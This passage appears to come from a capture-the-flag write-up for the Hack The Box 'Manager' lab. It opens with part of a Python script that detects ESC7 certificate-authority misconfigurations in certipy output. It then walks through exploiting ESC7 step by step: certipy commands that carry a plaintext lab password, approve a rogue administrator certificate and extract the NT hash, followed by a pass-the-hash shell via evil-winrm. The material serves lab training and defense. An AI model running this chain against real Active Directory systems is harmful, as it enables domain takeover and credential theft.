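                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\\Authenticated Users
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
"""

# Assumption: only these groups should ever manage the CA. Adjust per environment.
EXPECTED_CA_ADMINS: Set[str] = {"Administrators", "Domain Admins", "Enterprise Admins"}

# The two CA rights ESC7 is about.
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")

# "ManageCa   : DOMAIN\Principal" -> right name and its first principal.
RIGHT_LINE = re.compile(r"^(?P<right>[A-Za-z]+)\s*:\s*(?P<principal>.*\S)?\s*$")


def parse_access_rights(text: str) -> Dict[str, List[str]]:
    """Map each right under 'Access Rights' to the principals that hold it."""
    rights: Dict[str, List[str]] = {}
    current = None
    block_indent = None
    for line in text.splitlines():
        stripped = line.strip()
        indent = len(line) - len(line.lstrip())
        if block_indent is None:
            if stripped == "Access Rights":
                block_indent = indent
            continue
        # The block ends on a dedent or on the next certipy status line ([+]/[!]).
        if not stripped or indent <= block_indent or stripped.startswith("["):
            break
        m = RIGHT_LINE.match(stripped)
        if m:
            current = m.group("right")
            rights.setdefault(current, [])
            if m.group("principal"):
                rights[current].append(m.group("principal"))
        elif current is not None:
            # Continuation line: another principal holding the same right.
            rights[current].append(stripped)
    return rights


def short_name(principal: str) -> str:
    """'MANAGER.HTB\\Raven' -> 'Raven'."""
    return principal.rsplit("\\", 1)[-1]


def find_esc7(text: str, expected_admins: Set[str] = EXPECTED_CA_ADMINS) -> List[Tuple[str, str]]:
    """Return (principal, right) for every unexpected holder of a CA-management right."""
    findings: List[Tuple[str, str]] = []
    for right, principals in parse_access_rights(text).items():
        if right not in DANGEROUS_RIGHTS:
            continue
        for principal in principals:
            if short_name(principal) not in expected_admins:
                findings.append((principal, right))
    return findings


if __name__ == "__main__":
    for principal, right in find_esc7(SAMPLE_CERTIPY_OUTPUT):
        print(f"ESC7: {principal} holds {right} on the CA")
```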
Step 1: (If needed, as facilitated by Manage CA) Ensure capability to approve requests.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -add-officer 'raven'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

This uses the Manage CA privilege to add Raven to the officer (Certificate Manager) role, so Raven can now approve pending requests.
Step 2: (If needed) Ensure the SubCA template is enabled on the CA.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -enable-template 'SubCA'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

This uses Manage CA to make the SubCA template available for requests.
Step 3: Submit a certificate request using the SubCA template (expected to fail, since Raven has no enrollment rights on that template).
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -template 'SubCA' -upn 'administrator@manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 20
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '20.key'
[*] Wrote private key to '20.key'
[-] Failed to request certificate

The request is denied, but note the Request ID (20) and that the private key was saved to 20.key: the request is still stored on the CA, which is what the next step relies on.
Step 4: Approve the pending request.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -issue-request '20'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate request ID 20

Step 5: Retrieve the issued certificate
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -retrieve '20'                                    
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

We now hold administrator.pfx, a certificate issued for the Administrator account. It can be used with certipy auth -pfx administrator.pfx to authenticate as Administrator.
Now we can get the hash
└─$ certipy auth  -dc-ip '10.10.11.236' -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*]     SAN UPN: 'administrator@manager.htb'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

With the NT hash we can pass-the-hash over WinRM for a shell and root.txt:
└─$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/12/2025  12:50 PM             34 root.txt